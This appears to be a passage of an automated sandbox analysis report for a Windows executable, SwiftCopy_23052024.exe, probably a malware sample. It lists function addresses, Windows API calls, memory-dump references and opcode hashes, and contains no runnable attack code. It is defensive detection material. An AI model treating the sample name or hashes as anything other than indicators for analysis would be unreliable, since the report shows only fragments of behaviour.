Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
Opcode Fuzzy Hash: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D

Function 00405C2D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B3,00000000,00792100,000000FF,00792100,000000FF,000000FF,00000004,00000000), ref: 00405C41

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: 0d4b5292934197368b0f45fab11a858534e2fa67ffcff62b5ec67f53c8c98dda
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: 2BE0E632214759ABDF506E959C00AEB776CEB05390F004436F915E2150D631E8519BA4

Function 00405BFE Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031FD,00000000,00000000,0040304A,000000FF,00000004,00000000,00000000,00000000), ref: 00405C12

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: 15bd5d27262360345a0b198e16330f5e3575b7202d491c56c7af192eda573772
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: C8E0EC3261876AABEF109E55AC00AEB7BACEB05760F004836FD15E3190D631E9619BA4

Function 00405E73 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405F01,?,?,?,?,00000002,Execute: ), ref: 00405E97

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 4199424cdd911ade4eb2abdec76784ff09b2342150b3acef81222138bde116dc
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: B7D0EC32000609BBDF115F90DD05FAB371DEB08310F004826BE59A4090D6759520AB55

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c471a661ec47d1ea496eeab407824fc2b2ca984800e33ac4db78d2885d651f5b
Instruction ID: 20da0f78163d71a6e150bf73771415e465b024ed18823a272c7a1387d3cb682b
Opcode Fuzzy Hash: c471a661ec47d1ea496eeab407824fc2b2ca984800e33ac4db78d2885d651f5b
Instruction Fuzzy Hash: EDD05B72704200DBCB01EFE8EF08A5D7775EB55324F204537D101F21D1D2B88545975D

Function 004040C7 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010462,00000000,00000000,00000000), ref: 004040D9

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
Instruction ID: 4e90d0d88409270038b8e5dd21ed965c243834f72d7675745fce4010ef402404
Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
Instruction Fuzzy Hash: 90C09B717407017BFA20CB689D49F077794AB90700F14C4297351F50E5C674D410DA1C

Function 00403200 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,000305E4), ref: 0040320E

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D

Function 004056CF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00401F29,?), ref: 004056DE

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69

Function 004040B0 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08

Function 0040409D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E79), ref: 004040A7

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
Instruction ID: 939548ffee5b58c9ca03ae204caad8327118cb5bb39276deea9dcfc8bbd505dc
Opcode Fuzzy Hash: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
Instruction Fuzzy Hash: 65A00176444101AFCA02AF50EF09D4ABF62ABA4705B22843AE695940368A364872FF1D

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.1236581186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1236550408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236654576.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1236687137.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SwiftCopy_23052024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 44bff339ed9b71110523ccfd6abef5f1868400f63ed1a4604e15b78d3d15800f
Instruction ID: 58a32f90f567def110640d9dc390567cb18a6fab0a7cd362fc6929561968ffa9
Opcode Fuzzy Hash: 44bff339ed9b71110523ccfd6abef5f1868400f63ed1a4604e15b78d3d15800f
Instruction Fuzzy Hash: D3D05E73A10201CBD701EBB8AE8485E73B8E7513157204837D542F2191E6B8C9428628

Non-executed Functions

Function 0040450D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040455C
SetWindowTextA.USER32(00000000,?), ref: 00404586
SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
CoTaskMemFree.OLE32(00000000), ref: 00404642
lstrcmpiA.KERNEL32(Execute: ,0079F548), ref: 00404674
lstrcatA.KERNEL32(?,Execute: ), ref: 00404680
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692

Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700

Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
Part of subcall function 00406257: CharNextA.USER32(?,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
Part of subcall function 00406257: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403223,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,00000001,0079E518,?,?,000003FB,?), ref: 00404750
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B

